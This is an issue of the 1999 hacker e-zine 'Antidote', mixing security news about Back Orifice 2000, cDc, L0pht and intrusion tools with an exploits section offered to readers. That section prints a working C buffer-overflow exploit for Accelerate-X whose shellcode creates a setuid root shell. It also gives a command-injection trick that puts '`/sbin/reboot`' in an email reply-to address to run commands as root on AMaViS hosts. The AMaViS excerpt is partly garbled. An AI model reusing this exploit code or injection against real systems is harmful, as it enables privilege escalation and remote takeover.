Volume 2 Issue 12 7/22/99 ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** http://www.thepoison.org/antidote bof_ptr = (long *)buffer; for (i = 0; i < bufsize - 4; i += 4) *(bof_ptr++) = get_sp() - offs; printf ("Creating termcap f1le\n"); printf ("b1tch is Fe3lyn 1t.\n"; ------------------------------ In this issue of Antidote, we have over 690 subscribers and getting more everyday! The only thing that we ask of you when you read Antidote, is that you go to: www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you. -)!-- Contents //--(- 0.00 - Beginning 0.01 - What? 0.02 - FAQ 0.03 - Authors 0.04 - Shouts 0.05 - Writing 1.00 - News 1.01 - Back Orifice targets Windows NT 1.02 - Rhino9 calls it Quits 1.03 - Accreditation program for IT Labs 1.04 - CyberCop: Industry's first 'Decoy' 1.05 - Hackers Unleash Anti-Sniff Tools 1.06 - Getting tough on Virus-Creators 1.07 - cDc Challenges Microsoft in Recall 2.00 - Exploits (new & older) 2.01 - SDIaccelX.c.txt 2.02 - solaris.rpc.cmsd.bof.txt 2.03 - linux.amvis.root.txt 2.04 - iplogger.ymas.txt 3.00 - Misc Please submit misc. stuff to antidote@thepoison.org!!! SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just plane making fun of something or someone. FEAT.S - FEATURED SITES: http://browse.thepoison.org www.thepoison.org/secsource.html www.403-security.org www.hackernews.com ------------------------------ ************************************************** ________________________________________________ | ___ ___ __ __ | | | | |.-----.-----.| |_|__|.-----.-----. | | | || _ |__ --|| _| || | _ | | | |___|___||_____|_____||____|__||__|__|___ | | | http://www.thepoison.org/hosting |_____| | | | | Low affordable pricing starting at $10! | |________________________________________________| ************************************************** -)!-- 0.00 - Beginning //--(- 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a maga- zine that teaches you how to hack etc, then you might want to go to your local book- store and see if they carry '2600'. ------------------------------ 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve a link to the current Antidote (where you can view it). > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e- mails no matter what). We might use your article in future issues off Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ------------------------------ 0.03 --=\\Authors\\=-- Lord Oak is the founder and current president of Antidote. Most work is done by him. Please feel free to e-mail him at: lordoak@thepoison.org Duece is the co-founder and co-president of Antidote, some work is done by him when he comes online. Feel free to e-mail him at: duece@thepoison.org ox1dation not really an author, just someone that helps us out a lot and we consider him as an author! His e-mail address is: ox1dation@thepoison.org ------------------------------ 0.04 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the Misunderstanding. Well, here are the shout outs: Lord Oak EazyMoney Duece opt1mus oX1dation PBBSER Forlorn Retribution 0dnek www.thepoison.org Like we said above, if we forgot you and/or you think you should be added, please e- mail lordoak@thepoison.org and he will be sure to add you. ------------------------------ 0.05 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it). ------------------------------ -)!-- 1.00 - News //--(- 1.01 --=\\Back Orifice targets Windows NT\\=-- [www.cnn.com] (IDG) -- In the consumer world, folks like Ralph Nader fight for consumer rights by helping pass tough consumer protection laws. Then there's the PC world. For us, there's a self-proclaimed equivalent: Groups of (mostly teenaged) hackers basking in the glow of computer monitors, who release nasty computer bugs under the guise of strong-arming software makers to get tough on privacy and security. "We want to raise awareness to the vulnerabilities that exist within the Windows oper- ating system. We believe the best way to do this is by pointing out its weaknesses," says a member of the hacker group the Cult of the Dead Cow who goes by the pseudonym Sir Dystic. The Cult of the Dead Cow created and released the program Back Orifice last year to the general public at the Las Vegas hacker and security conference DEF CON. The program allows its users to remotely control victims' desktops, potentially undetected. Computer security experts question the Cult of the Dead Cow's intent. Releasing a hack- ing tool like Back Orifice 2000 in the name of safeguarding computer privacy is a bit like the American Medical Association infecting cattle with the deadly e. coli bacteria to inspire food companies to sell healthier meats. Unlike earlier versions that affected consumers and small businesses, Back Orifice 2000 hits large organizations because it runs on Windows NT systems, which are more used by businesses. Also, the updated program is modular, so users can add additional func- tions. For example, they could hide files or activate a computer's microphone for real- time audio monitoring, according to Cult of the Dead Cow. Back Orifice 2000 will also be more difficult to detect via network monitoring pro- grams, according to Sir Dystic. This is because the program can communicate back to the sender by using a variety of different protocols, making it hard to identify. The group also says it will make the source code available for Back Orifice 2000, which will likely spawn multiple strains of the program in the hacker community, experts say. Another purported function is real-time keystroke-logging, which can record and trans- mit a record of every keystroke of an infected computer. Also, the recipient can view the desktop of a targeted computer in real time. It should be noted that PC World Online has no independent confirmation that new Back Orifice 2000 program actually lives up to the claims of Cult of the Dead Cow. http://cnn.com/TECH/computing/9907/07/nthack.idg/index.html ------------------------------ 1.02 --=\\Rhino9 calls it Quits\\=-- 3 members of Rhino9 have moved to a far off place to accept a position at a security company with a good future. The rest of Rhino9 just didnt seem to want to continue on without the other 3 members. We have enjoyed everything we have done as a team and hope that we have been able to provide the community with some valuable resources. We want to thank everyone thats supported us over the years. A special thanks to Ken Williams of PacketStorm for excellent coverage of everything we did. Sorry to hear of your misfortune bro... JP is an ass. Thanks to L0pht for advice and tidbits of help over the years. Rhino9 has seen some rough times and some members come and go... but everyone seems to be doing well. To the community at large, thanks for everything and I'm sure this wont be the last you see of R9's members. Although the team is officially disbanding, its members are still very active. Thanks Again, -The Rhino9 Security Research Team ------------------------------ 1.03 --=\\Accredutation program for IT Labs\\=-- [www.fcw.com] The National Institute of Standards and Technology today announced the creation of an accreditation program for laboratories that test commercial information technology sec- urity products for compliance with federal and international standards. The National Voluntary Laboratory Accreditation Program will evaluate laboratories for their accordance with the National Information Assurance Partnership's Common Criteria Evaluation and Validation Scheme. NIST and the National Security Agency created the NIAP and the common criteria scheme to make it easier for federal agencies to choose commercial IT security products that meet certain standards. The NIAP Validation Body will review the test reports from the labs and issue certificates for the products. NIST will periodically assess the labs for reaccreditation. NIAP also is working toward a Common Criteria Mutual Recognition Agreement with similar organizations in five other countries to set a wider-reaching common standard for sec- urity products. http://www.fcw.com/pubs/fcw/1999/0712/web-nist-7-12-99.html ------------------------------ 1.04 --=\\CyberCop: Industry's first 'Decoy'\\=-- [www.yahoo.com] Today announced the immediate availability of its CyberCop Sting software, a new ``de- coy'' server that silently traces and tracks hackers, recording and reporting all in- trusive activity to security administrators. CyberCop Sting, an industry first, is an integral component of the CyberCop intrusion protection software family which also includes CyberCop Monitor, a real-time intrusion detection application that monitors critical systems and networks for signs of attack (see related release) and CyberCop Scanner, the industry's most highly-rated network vulnerability scanner. CyberCop Sting addresses the most unfulfilled need in intrusion protection products today by allowing IS managers to silently monitor suspicious activity on their corporate network and identify potential problems before any real data is jeopardized. CyberCop Sting operates by creating a series of fictitious corporate systems on a specially outfitted server that combines moderate security protection with sophisti- cated monitoring technology. The Sting product creates a decoy, virtual TCP/IP network on a single server or workstation and can simulate a network containing several differ- ent types of network devices, including Windows NT servers, Unix servers and routers. Each virtual network device has a real IP address and can receive and send genuine- looking packets from and to the larger network environment. Each virtual network node can also run simulated daemons, such as finger and FTP, to further emulate the activity of a genuine system and avoid suspicion by would-be intruders. While watching all traffic destined to hosts in its virtual network, Sting performs IP fragmentation reassembly and TCP stream reassembly on the packets destined to these hosts, convincing snoopers of the legitimacy of the secret network they've discovered. ``More than 60 percent of all security breaches are caused by authorized employees or contractors already inside the firewall,'' said Wes Wasson, director of product market- ing for Network Associates. ``CyberCop Sting gives security administrators, for the first time ever, a safe way to observe and audit potentially dangerous activity on their networks before it becomes a problem.'' CyberCop Sting provides a number of benefits for security administrators, including: * Detection of suspicious activity inside network; Log files serve to alert administrators to potential attackers prying into reserved areas. * Ability to record suspicious activity without sacrificing any real systems or protected information. * Virtual decoy network can contain multiple "hosts" without the expense and maintenance that real systems require. * CyberCop Sting software's virtual hosts return realistic packet information. * CyberCop Sting logs snooper activity immediately, so collection of information about potential attackers can occur before they leave. * CyberCop Sting requires very little file space but creates a sophisticated virtual network. Network Associates' CyberCop Intrusion Protection suite is a collection of integrated security tools developed to provide network risk assessment scanning (Scanner), real- time intrusion monitoring (Monitor) and decoy trace-and-track capabilities (Sting) to enhance the security and survivability of enterprise networks and systems. The suite is also enhanced by the development of technology and research derived from Network Associates' extensive product line, and includes industry-first features such as AutoUpdate, modular construction, and Active Security integration to provide extensive product integrity. A Network Associates white paper on next-generation intrusion detec- tion is available at http://www.nai.com/activesecurity/files/ids.doc. Pricing and availability CyberCop Sting is free with the purchase of CyberCop Monitor, Network Associates' new real-time intrusion detection software. Sting is also available as part of the full CyberCop suite, which also includes CyberCop Scanner, CyberCop Monitor and the CASL Custom Scripting Toolkit. The CyberCop Intrusion Protection suite is priced at $17 per seat for a 1,000 user license. With headquarters in Santa Clara, Calif., Network Associates, Inc. is a leading supp- lier of enterprise network security and management software. Network Associates' Net Tools Secure and Net Tools Manager offer best-of-breed, suite-based network security and management solutions. Net Tools Secure and Net Tools Manager suites combine to cre- ate Net Tools, which centralizes these point solutions within an easy-to-use, integra- ted systems management environment. For more information, Network Associates can be reached at 408-988-3832 or on the Internet at http://www.nai.com . NOTE: Network Associates, CyberCop, and Net Tools are registered trademarks of Network Associates and/or its affiliates in the United States and/or other countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners. http://biz.yahoo.com/prnews/990714/ca_ntwrk_a_1.html ------------------------------ 1.05 --=\\Hackers Unleash Anti-Sniff Tools\\=-- [www.nytimes.com] A Boston-based hacker think tank on Friday will unveil software that can detect whether or not Sniffer-type analyzers are being used to probe enterprise networks. L0pht Heavy Industries will introduce AntiSniff 1.0 at DefCon, an annual hackers' convention. A typical way for hackers -- both black-hat and ethical -- to gain access to an organ- ization's network is to use analyzers that can sniff or probe for passwords for net- worked systems. While many scanning tools can probe networks to expose potential vulnerabilities, they don't give IT managers a clear sense of whether or not systems have been compromised or broken into, said L0pht's chief scientist, who goes by the name Mudge. AntiSniff is designed to help IT managers be more proactive in thwarting security threats, Mudge told a gathering of security managers and experts today at The Black Hat Briefings. "Don't play reactive," Mudge said. "There are new ways to look for [new attack] pat- terns." L0pht said it plans to release all technical details for AntiSniff to the public . But the monitoring software carries a doubled-edge sword. While it can be used by "good guys" to thwart network intruders, it can also be used by the "bad guys" to sniff out a company's network intrusion systems, Mudge said. http://www.nytimes.com/techweb/TW_Hacker_Think_Tank_To_Unleash_Anti_Sniff_Tools.html ------------------------------ 1.06 --=\\Getting tough on Virus-Creators\\=-- [www.edmontonjournal.com] Ottawa has to get tougher with hackers who send file-destroying computer viruses over the Internet, the industry association representing Canada's computer industry said Thursday. The mischievous makers who devise programs that destroy corporate computer files and cause entire high-tech systems to collapse are getting away with a slap on the wrist for a crime that is costing the Canadian economy millions annually, said Andre Gauth- ier, chair of the Information Technology Association of Canada and senior vice-presi- dent of LGS Group Inc. "Too many people consider these things as funny. But sending a virus is just like laun- ching a terrorist attack on a company," Gauthier said. ITAC, which represents 1,300 Canadian software and hardware companies, sent a letter Thursday to federal Justice Minister Anne McLellan asking her to increase the penalties for this kind of crime and to work more closely with other law enforcement agencies globally to track down virus makers. Over the past several months, the Chernobyl, Melissa and Worm-Explore.Zip viruses made headlines internationally as they attacked the computer systems of corporations and government agencies in many countries. Viruses are programs that enter a computer system through the e-mail or other external links and then cause havoc in the network, everything from exploding fireworks on a person's computer screen to the elimination of stored files on the system's hard drive. In many cases, these hackers are people who enjoy the intellectual challenge of writ- ing. In other situations, they are only after the publicity these viruses can receive, causing people to treat these crimes as less dangerous. "But (in the information age), a crime no longer requires a .45-calibre Magnum. We have to deal with these things in a far more serious manner. They do a lot of damage," said Robert Lendvai, vice-president of marketing at OLAP@Home Inc., an Ottawa-based software programmer. For instance, one Ottawa public relations firm had to close its doors for one day to repair the damage from the Melissa virus, he said. ITAC's Gauthier figured Canadian corporations and governments lose $100 million annual- ly because of these computer bugs. That figure was extrapolated from the $1-billion US loss estimated to American corporations derived from an earlier U.S. study. Companies are getting help in the form of more sophisticated virus detection programs, now "a basic protection" for any smart firm, said David Lynch, vice-president of sales and marketing of KyberPASS Corp., an Ottawa-based electronic commerce software maker. These detection programs generally work by looking for indicators within a corporate computer system that change for an unexplained reason. In that case, the program will send a warning that you may have a problem. "But viruses are always going to be with us," he said. KyberPASS was hit by three viruses in the past year, two of which entered the system through the company's e-mail and one when someone in the corporation downloaded an out- side file, Lynch said. "It's computer vandalism. Some of it is paint on the walls. And some is like throwing eggs at the door," he said. http://www.edmontonjournal.com/technology/stories/990716/2615262.html ------------------------------ 1.07 --=\\cDc Challenges Microsoft in Recall\\=-- [www.cultdeadcow.com] The CULT OF THE DEAD COW (cDc) publicly challenges Microsoft Corporation to voluntarily recall all copies of its Systems Management Server network software. In addition, cDc calls for the antivirus industry to respond with signature scanning for SMS files. "Hypocrisy" is such an ugly word. So instead, why don't we just chalk this one up to Do-What-We-Say-Not-What-We-Do? Microsoft evidently dislikes our new tool so much that they've taken to complaining about one of its key features. We're talking about Back Orifice 2000, and the feature in question is its stealth mode. Microsoft has claimed that BO2K is a malicious tool with no legitimate use. Their pri- mary evidence is BO2K's stealth feature, which gives you the option to run the server on the remote machine without it being evident to anybody sitting at that machine. In fact, here's what they're saying right now on the Microsoft Security Advisor web- site: BO2K is a program that, when installed on a Windows computer, allows the computer to be remotely controlled by another user. Remote control software is not malicious in and of itself; in fact, legitimate remote control software packages are available for use by system administrators. What is different about BO2K is that it is intended to be used for malicious purposes, and includes stealth behavior that has no purpose other than to make it difficult to detect. Now, we concede that on its face, this sounds like a valid criticism. Being able to operate a remote admin tool without the person at the other end knowing that it's runn- ing on the machine seems downright devious. (Keep in mind that BO2K's stealth feature is an OPTION, which is in fact disabled by default.) Maybe Microsoft is right; perhaps this stealth feature in and of itself is enough to brand it a hacker tool with no redeeming social value. But then, what are we to make of Systems Management Server (SMS)? SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly identical stealth feature. As a matter of fact, they explain this feature in a Word document available from the Microsoft website: Security Of all the operations that Systems Management Server allows you to do on a client, re- mote control is possibly the most "dangerous" in terms of security. Once an administra- tor is remote controlling a client, he has as many rights and access to that machine as if he were sitting at it. Added to this, there is also the possibility of carrying out a remote control session without the user at the client being aware of it. Thus, it is important to understand the different security options available and also to understand the legal implications of using some of them in certain jurisdictions." Visible and Audible Indicators It is possible to configure a remote control from a state where there is never any visible or audible indication that a remote control session is under way. It has been made this flexible due to customer demands ranging from one end of this spectrum to the other. When configuring the options available in the Remote Tools Client Agent proper- ties, due notice must also be taken of company policy and local laws about what level of unannounced and unacknowledged intrusion is permitted." Notice that? Microsoft's own tool has the same evil capability as BO2K. Now, Microsoft did not invent surreptitious desktop surveillance; there are other pro- ducts on the market that perform these functions. Microsoft is just the largest supp- lier of the technology, as SMS comes bundled with each copy of Back Office. Why is it that Microsoft can offer a tool having this illegitimate functionality with- out any moral qualms, but when WE do it, they throw a hissy fit? Well... we have a hunch. "Microsoft wants to keep everybody talking about the evil software from us crazy comp- uter hackers. So they paint BO2K as a dangerous application with no constructive uses," says Reid Fleming (cDc). "We beg to differ." BO2K doesn't exploit any bugs in the Windows operating system that Microsoft is willing to categorize as such. So in order to convince the public that BO2K is a solely des- tructive tool, Microsoft is forced to criticize the tool's feature set. Evidently who- ever dreamed up this press strategy was unaware of Systems Management Server and its stealth feature. Of course, there's another possibility. Microsoft sells SMS for cash money. Meanwhile, BO2K is free. (It's also open source, and better constructed any way you measure it: size, efficiency, functionality, security.) Maybe this is just another example of Microsoft's alleged anticompetitiveness? "BO2K, like SMS, is a powerful software tool. Like any powerful tool, it can be used either responsibly or irresponsibly," says Count Zero (cDc). "For Microsoft to claim that BO2K has no legitimate purpose is ridiculous. Their own SMS tool has nearly the same functionality as BO2K, and Microsoft is happy to let you pay $1,000+ for it." Regardless of their motivations, Microsoft is selling software which does many of same things as Back Orifice 2000, including the pernicious ability to run hidden from the user. And if stealth mode is what makes BO2K a malicious program, then Microsoft's Sys- tems Management Server is a malicious program too. Consequently, we challenge Microsoft to recall all copies of the SMS administration tool, because its featureset contains stealth capability. This feature clearly illus- trates that their software has no legitimate use. Furthermore, we urge all antivirus vendors to include signatures for SMS in their scanner utilities. Back Orifice 2000 is available for download free of charge from . http://www.cultdeadcow.com/news/pr19990719.html ------------------------------ -)!-- 2.00 - Exploits //--(- 2.01 --=\\SDIaccelX.c.txt\\=-- /* * SDI linux exploit for Accelerate-X * Sekure SDI - Brazilian Information Security Team * by c0nd0r * * This script will exploit a vulnerability found by KSRT team * in the Accelerate-X Xserver [<=5.0]. * * -------------------------------------------------------------------- * The vulnerable buffer was small so we've changed the usual order to: * [garbage][eip][lots nop][shellcode] * BTW, I've also changed the code to execute, it will create a setuid * shell owned by the superuser at /tmp/sh. * -------------------------------------------------------------------- * * Warning: DO NOT USE THIS TOOL FOR ILICIT ACTIVITIES! We take no * responsability. * * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia, * marty (NORDO!), vader, fcon, slide, c_orb and * specially to my sasazita. Also toxyn.org, pulhas.org, * superbofh.org (Phibernet rox) and el8.org. * * Laughs - lame guys who hacked the senado/planalto.gov.br * pay some attention to the site: securityfocus.com (good point). * see you at #uground (irc.brasnet.org) */ #include /* generic shellcode */ char shellcode[] = "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36" "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88" "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3" "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xca\xff\xff\xff" "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh"; main ( int argc, char *argv[] ) { char buf[1024]; int x, y, offset=1000; long addr; int joe; if (argc > 1) offset = atoi ( argv[1]); /* return address */ addr = (long) &joe + offset; buf[0] = ':'; for ( x = 1; x < 53; x++) buf[x] = 'X'; buf[x++] = (addr & 0x000000ff); buf[x++] = (addr & 0x0000ff00) >> 8; buf[x++] = (addr & 0x00ff0000) >> 16; buf[x++] = (addr & 0xff000000) >> 24; for ( ; x < 500; x++) buf[x] = 0x90; for ( y = 0; y < strlen(shellcode); y++, x++) buf[x] = shellcode[y]; fprintf (stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%x\n\n", offset, addr); buf[strlen(buf)] = '\0'; execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0); // setenv ( "EGG", buf, 1); // system ( "/bin/sh"); } ------------------------------ 2.02 --=\\solaris.rpc.cmsd.bof.txt\\=-- Subject: Re: Exploit of rpc.cmsd Date: Sat Jul 10 1999 00:43:08 Author: Andy Polyakov Bob! > The calendar manager (rpc.cmsd) on Solaris 2.5 and 2.5.1 is vulnerable > to a buffer overflow > attack... > ... we have seen the > intruder delete administrator > logs, change homepages, and insert backdoors. The attack signature is > similar to the tooltalk attack. Can you confirm that compromised system(s) were equipped with CDE? Or in other words was it /usr/dt/bin/rpc.cmsd that was assigned to do the job in /etc/inetd.conf? > Further, it appears that even patched versions may be > vulnerable. Could you be more specific here and tell exactly which patches are you talking about? > Also, rpc.cmsd under > Solaris 2.6 could also be problematic. I want to point out that there is a rather fresh 105566-07 for Solaris 2.6 which claims "4230754 Possible buffer overflows in rpc.cmsd" fixed. There is rather old 103670-03 for Solaris 2.5[.1] which claims "1264389 rpc.cmsd security problem." fixed. Then there is 104976-03 claiming "1265008 : Solaris 2.x rpc.cmsd vulnerabity" fixed. Are these the ones you refer to as "patched versions" and "could be problematic"? Andy. ------------------------------ 2.03 --=\\linux.amvis.root.txt\\=-- Subject: AMaViS virus scanner for Linux - root exploit Date: Fri Jul 16 1999 16:00:43 Author: Chris McDonough The AMaViS incoming-mail virus scanning utility (available at http://satan.oih.rwth-aachen.de/AMaViS/) for Linux has problems. I tried to contact the maintainer of the package (Christian Bricart) on June 26, again several times over the course of the last month, but I have not received anything from him and the AMaViS website does not yet acknowledge the problem or provide a fix. However, on Jun 30, co-contributors to the package (Juergen Quade and Mogens Kjaer) responded quickly with an acknowledgement of the problem and a few fixes. Because the co-authors do not maintain the downloadable package, however, the latest downloadable version of AMaViS (0.2.0-pre4 and possibly earlier) still has a bug which allows remote users to send arbitrary commands as root to a Linux machine running the AMaViS scripts. Exploit: Send a message with a virus-infected file attachment. Use something like "`/sbin/reboot`@dummy.com " as your reply-to address in your MUA when sending the message. When the AMaViS box receives the message, it will go through its scripts, find the virus, construct an email message to send back to the sender of the virus-infected file... line 601+ in the "scanmails" script: cat < # +# or # +# $(/sbin/reboot) @softing.com # +# The execution of the command (/sbin/reboot) is done by the # +# "mail" program. Therefore we parse the arguments in order # +# to substitute those characters to nothing # + # # +# Wed Jun 30 11:47:55 MEST 1999 # + ############################################################ ### + +# substitute all "`","$(",")" to nothing +receiver=${7//\`/} +receiver=${receiver//\$\(/} +receiver=${receiver//\)/} + +sender=${2//\`/} +sender=${sender//\$\(/} +sender=${sender//\)/} + +if [ "$sender" != "$2" -o "$receiver" != "$7" ] ; then + cat < # +# or # +# \$\(/sbin/rebbot\) @softing.com # +# The execution of the command (/sbin/rebbot) is done by the # +# "mail" program. Therefore we parse the arguments in order # +# to substitute those characters to nothing # + # # +# Wed Jun 30 11:47:55 MEST 1999 # + ############################################################ ### + $7 or $2 is not a valid Email address + (changed to $receiver and $sender)! +EOF +fi +# + ################################################ # main program # # -------------- # @@ -171,8 +215,8 @@ echo xxxxxxxxxxxxxxxxxx`date`xxxxxxxxxxxxxxxxxxxxxxx > ${tmpdir}/logfile echo ${scanscriptname} called $* >>${tmpdir}/logfile -echo FROM: $2 >>/${tmpdir}/logfile -echo TO: $7 >>/${tmpdir}/logfile +echo FROM: $sender >>/${tmpdir}/logfile +echo TO: $receiver >>/${tmpdir}/logfile ${metamail} -r -q -x -w ${tmpdir}/receivedmail > /dev/null 2>&1 @@ -597,11 +641,11 @@ ################### send a mail back to sender ###################### -cat < Re, tcplog is part of iplogger-1.2. from tcplog.c #ifdef DETECT_BOGUS /* Nmap and Queso use a bogus tcp flag to "fingerprint" OS'es.. */ if ((hdr.tcp.th_flags & TH_BOG) && last_bogus != hdr.ip.ip_src.s_addr) { last_bogus = hdr.ip.ip_src.s_addr; syslog(LEVEL, "bogus tcp flags set by %s (%s)", hostlookup(hdr.ip.ip_src.s_addr, (syncount != SYN_FLOOD)), inet_ntoa(hdr.ip.ip_src)); } #endif but this isn't enought. Ymas (0x80) bogus flag must be logged. try hping -Y to test if your port scanning detector have the same problem. poblem noticed with ntf >. Here is the patch (but i think it's better to rewrite) --- tcplog.c Mon Jul 19 05:32:58 1999 +++ tcplog-new.c Mon Jul 19 05:46:48 1999 @@ -59,6 +59,7 @@ #ifdef DETECT_BOGUS # define TH_BOGUS 0x40 +# define TH_OTHER_BOG 0x80 # define TH_BOG TH_BOGUS #endif @@ -133,7 +134,7 @@ #ifdef DETECT_BOGUS /* Nmap and Queso use a bogus tcp flag to "fingerprint" OS'es.. */ - if ((hdr.tcp.th_flags & TH_BOG) && last_bogus != hdr.ip.ip_src.s_addr) { + if ((((hdr.tcp.th_flags & TH_BOG) || (hdr.tcp.th_flags & TH_OTHER_BOG))) && last_bogus != hdr.ip.ip_src.s_addr) { last_bogus = hdr.ip.ip_src.s_addr; syslog(LEVEL, "bogus tcp flags set by %s (%s)", hostlookup(hdr.ip.ip_src.s_addr, (syncount != SYN_FLOOD)), inet_ntoa(hdr.ip.ip_src)); } antirez ------------------------------ -)!-- 3.00 - Misc //--(- We have no misc things, please submit them. We have been working hard on Security Source/Embryonic Project. If you go to our site (www.thepoison.org), you will notice a new layout not dedicated to hacking but dedicat- ed to computer security. Security Source/Embryonic Project has over 4,000 programs, exploits tutorials and other misc things for you to view and download. Most of these files are located at our new subdomain because we don't have the time to upload and make "fancy" webpages for all of the content so our new subdomain is basic/typical HTML. It can be located at: http://browse.thepoison.org ------------------------------ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- . Quote #6- . . . . *JP stands up* . . "Hi, my name is JP and I am addicted to lying." . . *Everyone claps and JP sits down* . . . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission is needed before using.